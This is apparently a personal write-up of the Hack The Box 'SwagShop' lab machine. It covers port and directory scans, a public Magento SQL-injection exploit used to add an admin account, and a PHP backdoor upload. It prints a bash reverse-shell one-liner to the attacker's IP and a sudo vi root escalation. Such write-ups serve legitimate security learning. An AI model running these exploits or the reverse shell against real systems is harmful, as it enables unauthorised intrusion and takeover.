Hack The Box: SwagShop machine write-up
This machine, that runs with ip
10.10.10.140, was a really good and entertaining way of learning about Magento CMS and how different exploits can be chained together in order to achieve RCE. The first one is based on a SQL injection which lets us add a user to the Magento db, which then grants us access to the admin panel. From there, we can upload a backdoor that can be escalated to root thanks to a misconfiguration on the server that lets us run
vi as user
The only downside of it was that most people were making it crash all the time, which made it really hard for me to be able to experiment without constant resets… Overall I’d say this was one of the most unstable boxes I’ve done.
As always, we start by enumerating open ports to discover the services running in the machine. I fire up nmap:
Result of nmap scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 # Nmap 7.70 scan initiated Tue Jun 11 10:41:39 2019 as: nmap -sV -sC -oA nmap/initial 10.10.10.140 Nmap scan report for 10.10.10.140 Host is up (0.025s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Error 503: Service Unavailable Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 11 10:41:53 2019 -- 1 IP address (1 host up) scanned in 14.33 seconds
We don’t have much, just SSH and a web server, so we’ll start by checking out port 80.
Web server enumeration
At first we are greeted with what looks like a store. Upon this, I immediately run dirb on the background so that it runs while I tinker around with the website.
Website found on port 80
I didn’t found much manually, so I came back to check the dirb results and bingo! It found something:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Jun 12 17:18:17 2019 URL_BASE: http://10.10.10.140/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.140/ ---- ==> DIRECTORY: http://10.10.10.140/app/ ==> DIRECTORY: http://10.10.10.140/downloader/ ==> DIRECTORY: http://10.10.10.140/errors/ + http://10.10.10.140/favicon.ico (CODE:200|SIZE:1150) ==> DIRECTORY: http://10.10.10.140/includes/ + http://10.10.10.140/index.php (CODE:200|SIZE:16097) ==> DIRECTORY: http://10.10.10.140/js/ ==> DIRECTORY: http://10.10.10.140/lib/ ==> DIRECTORY: http://10.10.10.140/media/ ==> DIRECTORY: http://10.10.10.140/pkginfo/ + http://10.10.10.140/server-status (CODE:403|SIZE:300) ==> DIRECTORY: http://10.10.10.140/shell/ ==> DIRECTORY: http://10.10.10.140/skin/ ==> DIRECTORY: http://10.10.10.140/var/
/downloader we can observe that the website is using Magento, a CMS that was subject to some attacks in the past.
Control panel for Magento (
Gaining user with Magento
We don’t have any credentials to log in to the control panel, so I went straight into searchsploit to see if there were any exploits available.
Results from searchsploit search
I started to try all of them until one finally worked: Magento eCommerce - Remote Code Execution. I copied the python script to my working directory with:
searchsploit -m exploits/xml/webapps/37977.py`. And had a look at it. It looked like a SQL injection, so I ran it after modifying the following lines:
1 target = "http://10.10.10.140/index.php"
Then I modified the credentials I wanted to have to be
root2u:root2u and ran it:
Output of exploit script
The I just log in to the panel with those creds and have the possibility to upload some kind of package:
/downloader control panel
I googled around and found this website where it’s explained how it’s possible to create a package with a simple php file. I followed it and used this shell from pentestmonkey. However, it didn’t work and the php file was recognised as a directory when I tried to access it.
Uploading module as a
.tar.gz file doesn’t work
Eventually I bumped into an article on the internet where they were using another extension:
.tgz. I tried and it worked!
http://10.10.10.140/errors2/backdoor.php grants me a shell and we can read the user flag:
Shell gained from php backdoor
Getting to root
Once on this shell I noticed that I needed an actual proper shell and sho I opened up another listener with netcat and ran:
bash -c 'bash -i >& /dev/tcp/10.10.12.11/8080 0>&1'.
After that, I ran
sudo -l to see if I could run any commands as root and it turned out that I did:
Improving the shell
I can run the file editor
vi as root under the directory
/var/www/html/* so I created a new file and used a command propmt command to read the root flag (commands can be executed from within vi):
Getting the root hash
And that’s it! I could’ve also ran
:!/bin/bash to get a root shell and read the flag from there, but I just did this as it was more straightforward.
I hope you learned something with this cool box and enjoyed the write-up!
Diego Bernal Adelantado